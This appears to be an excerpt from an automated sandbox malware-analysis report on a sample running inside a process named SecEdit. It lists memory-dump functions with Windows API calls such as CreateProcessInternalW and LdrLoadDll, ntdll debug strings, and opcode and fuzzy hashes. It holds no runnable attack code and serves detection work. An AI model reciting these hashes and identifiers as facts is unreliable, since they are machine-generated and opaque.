                                                            • Opcode Fuzzy Hash: 5b2c85f859fd3541cda50df0646067ed3c31d3ea093f33fac28a1776c8a40ccf
                                                            • Instruction Fuzzy Hash: B0313275A0020AAFDB00DFD8D8819EFB7B9FF88304B148559E916EB214D775EE05CBA0
                                                            Function 00587997 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00581780,kY,005944C7,?), ref: 005879D3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID: e
                                                            • API String ID: 2340568224-4024072794
                                                            • Opcode ID: ba807243fc30d7d320032dc57e579819e73e65dea590090f317e836402c3f32a
                                                            • Instruction ID: 8eeab8eac439f683dc4baba6302d3ab5af5ad087b2940bcc7fb5cf52488a5c22
                                                            • Opcode Fuzzy Hash: ba807243fc30d7d320032dc57e579819e73e65dea590090f317e836402c3f32a
                                                            • Instruction Fuzzy Hash: CD1159A1A582473AEF10B7E0DC4AFAA3FA8BB95310F0444D9F8099B083E535DA418755
                                                            Function 00598240 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessInternalW.KERNELBASE(00580D31,00580D59,00580B31,00000000,S{X,00000010,00580D59,?,?,00000044,00580D59,00000010,00587B53,00000000,00580B31,00580D59), ref: 005982A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateInternalProcess
                                                            • String ID: S{X
                                                            • API String ID: 2186235152-952119296
                                                            • Opcode ID: 3ef5de150010b2baf9e9a8639160cef9fc4ccff9139c5c8f1548d8085bd98910
                                                            • Instruction ID: 86371fe1bb58cec131d8d2e11187a4a586afb5e99fbf86b42e57358a3301f29b
                                                            • Opcode Fuzzy Hash: 3ef5de150010b2baf9e9a8639160cef9fc4ccff9139c5c8f1548d8085bd98910
                                                            • Instruction Fuzzy Hash: 7B01C0B2204109BFCB04DE99DC81EEB77AEAFCC754F118208BA19E3240D630FC518BA4
                                                            Function 00584270 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005842E2
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: cc12b25d517994b9bcc517731b469122a00c5f8ed43c7c54d5fb46cc540c6b3e
                                                            • Instruction ID: fa5c8acd280e8be17ef195af0f5aabc6a769f57f3f1fb5c72c6d6a8101f69373
                                                            • Opcode Fuzzy Hash: cc12b25d517994b9bcc517731b469122a00c5f8ed43c7c54d5fb46cc540c6b3e
                                                            • Instruction Fuzzy Hash: FE011EB9D0020EABDF10EAE4DD46FADBBB8AB54308F004195FD09A7241F631EB14CB91
                                                            Function 00579810 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00579855
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: df60333ca4035af3795eb17f96f433c8c1637812866560c4fdbfdf0431deeb70
                                                            • Instruction ID: 9e873fe9069b9e0767724729f4cc64664763b5a7715cad09b8ef37262d487b92
                                                            • Opcode Fuzzy Hash: df60333ca4035af3795eb17f96f433c8c1637812866560c4fdbfdf0431deeb70
                                                            • Instruction Fuzzy Hash: 40F0653338061576E63065AAAC06FDBB69CEBC17A1F144425F60CDB1C1D996B84152E9
                                                            Function 00579808 Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00579855
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: d870ddacc431046cb17b063917238504fe210a892dd5982e0ddcb3b196510b10
                                                            • Instruction ID: bac72b68e64ca428222d1efbf2ce568e3b936e4a421a6cd7587b01d144ce7ca0
                                                            • Opcode Fuzzy Hash: d870ddacc431046cb17b063917238504fe210a892dd5982e0ddcb3b196510b10
                                                            • Instruction Fuzzy Hash: A8F02B3338071437E63065AA9C07FDB768CEBC17A0F104424F61CAB1C0CD92B84142E9
                                                            Function 00598160 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00581499,?,00594613,00581499,005944C7,00594613,?,00581499,005944C7,00001000,?,?,00599A30), ref: 0059819C
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 466c08e0599dceb2b1ac87d31f08fd08cfc95ce86fcefad45fa711f2d663cd9b
                                                            • Instruction ID: 03f885297dc8e6bd69d75e2a337a851a03534d4633644390c608f4383fc4ee3e
                                                            • Opcode Fuzzy Hash: 466c08e0599dceb2b1ac87d31f08fd08cfc95ce86fcefad45fa711f2d663cd9b
                                                            • Instruction Fuzzy Hash: 0BE06D722002047BDA10EE99DC45EAB37ADEFC9710F004408F90CA7241D670B81087B8
                                                            Function 005981B0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,00583B3D,000000F4,?,?,?,?,?), ref: 005981EF
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: ff1f9aa8da99a8e5e4f90dc6e257a5551f3bffd3857a71a35f413fcecc4b40f6
                                                            • Instruction ID: 067f767da3710b388bc7b674d4b308ad89d26ef39592ef6840170b43d2066353
                                                            • Opcode Fuzzy Hash: ff1f9aa8da99a8e5e4f90dc6e257a5551f3bffd3857a71a35f413fcecc4b40f6
                                                            • Instruction Fuzzy Hash: EEE065B2200204BBCA10EE98DC45FAB37ADEFC9720F408009FD08A7241CB70B8118BB9
                                                            Function 00587B90 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00587BBC
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 346f106ef012eeab0b2d0f87fcdd4f07fea3ae5dc956916af8c5ff15373ca4b5
                                                            • Instruction ID: 5ef0c587c7d4a446322700f3f8cbe65a74b0348651ab9fcef26d501deaf823c5
                                                            • Opcode Fuzzy Hash: 346f106ef012eeab0b2d0f87fcdd4f07fea3ae5dc956916af8c5ff15373ca4b5
                                                            • Instruction Fuzzy Hash: B3E0D83124420857EA2069B8DC45B653348D788720F248960BC1C9B1D1E579E8414350
                                                            Function 005879A0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00581780,kY,005944C7,?), ref: 005879D3
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, Offset: 00570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_570000_SecEdit.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: ea0d679fe722e919c2c81e15dceb05912d763369d304a35d84073faadfcb31ac
                                                            • Instruction ID: 4ca8e632e30ddef6f14673ecc58f788288c355300342d604cf92a84ee633de2c
                                                            • Opcode Fuzzy Hash: ea0d679fe722e919c2c81e15dceb05912d763369d304a35d84073faadfcb31ac
                                                            • Instruction Fuzzy Hash: ABD05E723C43063BFA40E6F5DC0BF6A3A8DAB44B94F148464F94CE72C2ED56E51043AA
                                                            Function 03012C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 05e701d496272dbb3982f4b221c5399c83a687cdfcc8a7056710a66749507b38
                                                            • Instruction ID: 512490c815a091b1528035ccbb738bc1709aa6b114524f3c65a621d2d865d57b
                                                            • Opcode Fuzzy Hash: 05e701d496272dbb3982f4b221c5399c83a687cdfcc8a7056710a66749507b38
                                                            • Instruction Fuzzy Hash: BEB09B719035D5C6EA51E76046097177D4467D0701F1AC462D3030641F4739C1E1E275

                                                            Non-executed Functions

                                                            Function 03012890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: 8e85bc07e0693a0d451f3abf9fcb2c8acba9b7d96c15a3d43b0842d669f6e1b5
                                                            • Instruction ID: 32092000edcddd2ead0da99931032d356157c709fbd778085b3354e904c0b5e4
                                                            • Opcode Fuzzy Hash: 8e85bc07e0693a0d451f3abf9fcb2c8acba9b7d96c15a3d43b0842d669f6e1b5
                                                            • Instruction Fuzzy Hash: 4B5118B6B01216BFDB10DF9C89D097EFBFCBB48240B548669E465D7641D274DE108BE0
                                                            Function 03007630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 03044787
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 030446FC
                                                            • ExecuteOptions, xrefs: 030446A0
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03044655
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03044725
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03044742
                                                            • Execute=1, xrefs: 03044713
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            • API String ID: 0-484625025
                                                            • Opcode ID: 78d846ba11823f43fbd9d32f98dc098f049941d8c05be9905dcad6facc3c6e69
                                                            • Instruction ID: ee0d7b2cddb3e308d629f03c489415b2aefa656a5e1001d454cb722d9aa4095c
                                                            • Opcode Fuzzy Hash: 78d846ba11823f43fbd9d32f98dc098f049941d8c05be9905dcad6facc3c6e69
                                                            • Instruction Fuzzy Hash: 29512775A02309AAFF11EBA5DC95BEF73A8AF44740F0404A9E50AAB1C0DB75AA41CF51
                                                            Function 0301B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            • API String ID: 1302938615-699404926
                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction ID: 1b6c38b4f173f5899c3c3c534730d54c1462aee19b51b639f889e89a3499a1fe
                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction Fuzzy Hash: 4B81DD70E132499FDF24CE68C8907FEBBE2AF55720F1C465AE861A7390C7748861CB60
                                                            Function 02FFF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 030402BD
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 030402E7
                                                            • RTL: Re-Waiting, xrefs: 0304031E
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            • API String ID: 0-2474120054
                                                            • Opcode ID: adb2241f30887156c83078f844dd8fb64eaed3f16336127ffb601d676adf9258
                                                            • Instruction ID: 9e8a39a0bfdaabdc0cb1c3c14c0fa1ef7089ab2ffdc18f7a9cd010c7632e0eb8
                                                            • Opcode Fuzzy Hash: adb2241f30887156c83078f844dd8fb64eaed3f16336127ffb601d676adf9258
                                                            • Instruction Fuzzy Hash: 29E1DC716097419FD760CF28C884B2AF7E0BF88754F140A6DF6A59B6E0D774E944CB42
                                                            Function 0300BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RTL: Resource at %p, xrefs: 03047B8E
                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03047B7F
                                                            • RTL: Re-Waiting, xrefs: 03047BAC
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 0-871070163
                                                            • Opcode ID: 8043a97e0b52f15629e382a9f4564dabcf5df76de3064e1a277b42c3418c9dde
                                                            • Instruction ID: 1282be65a0d6b130d45ccdbf453df4781ab7aff3b40745d7ad006f417bd6719a
                                                            • Opcode Fuzzy Hash: 8043a97e0b52f15629e382a9f4564dabcf5df76de3064e1a277b42c3418c9dde
                                                            • Instruction Fuzzy Hash: 714104757027029FE724DE29CC40B6BB7E9EF88710F040A2DF95ADB280DB71E9058B91
                                                            Function 0300B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0304728C
                                                            Strings
                                                            • RTL: Resource at %p, xrefs: 030472A3
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03047294
                                                            • RTL: Re-Waiting, xrefs: 030472C1
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 885266447-605551621
                                                            • Opcode ID: 923cb81073fa4f47bbffc24fc571b93d8703050d7576e84021ac8247e2f1eda6
                                                            • Instruction ID: 8e1f96b33de741229afe70915ce4dcdf70343e77f553db67dcb308ed7df9421a
                                                            • Opcode Fuzzy Hash: 923cb81073fa4f47bbffc24fc571b93d8703050d7576e84021ac8247e2f1eda6
                                                            • Instruction Fuzzy Hash: F3412375702306ABE720DE25CD41FAAB7E5FF84B10F140A29FD65AB280DB21F94287D1
                                                            Function 03017D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-
                                                            • API String ID: 1302938615-2137968064
                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction ID: bd89da3530b5189ff17fd48550033517c73a355246dea417c9563102a31aebb7
                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction Fuzzy Hash: 07919371E0221A9BDF64DE69C881BBFB7F5EF44B20F18851EE865E72C0D73099618750
                                                            Function 02FD9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            • API String ID: 0-1194432280
                                                            • Opcode ID: 815452b110d3a9826445386e0ad58e16ce5075fb73f5eecd14094d87eb706328
                                                            • Instruction ID: b70be8ae76fc6262798e714917094147f1b49ec987ff117e42b9f89c29528554
                                                            • Opcode Fuzzy Hash: 815452b110d3a9826445386e0ad58e16ce5075fb73f5eecd14094d87eb706328
                                                            • Instruction Fuzzy Hash: DD813B71D012699BDB31DF94CC44BEEB7B9AF49750F0445EAAA09B7280D7709E84CFA0
                                                            Function 0305CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 0305CFBD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.3792654545.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                            • Associated: 0000000C.00000002.3792654545.00000000030C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.00000000030CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000000C.00000002.3792654545.000000000313E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_2fa0000_SecEdit.jbxd
                                                            Similarity
                                                            • API ID: CallFilterFunc@8
                                                            • String ID: @$@4rw@4rw
                                                            • API String ID: 4062629308-2979693914
                                                            • Opcode ID: 933177afcd243f21c7e6a603f8df472aa18c231b0f265397741e321f65b44e58
                                                            • Instruction ID: 8b61ea0600bdf32db9678d3f5ac22443507e4c4cfdfb9b5c25a47c970316bf68
                                                            • Opcode Fuzzy Hash: 933177afcd243f21c7e6a603f8df472aa18c231b0f265397741e321f65b44e58
                                                            • Instruction Fuzzy Hash: 4D419B769122189FCB22DFA8D840AAEBBF8EF44B10F04456AFA15DB264D734D801CB60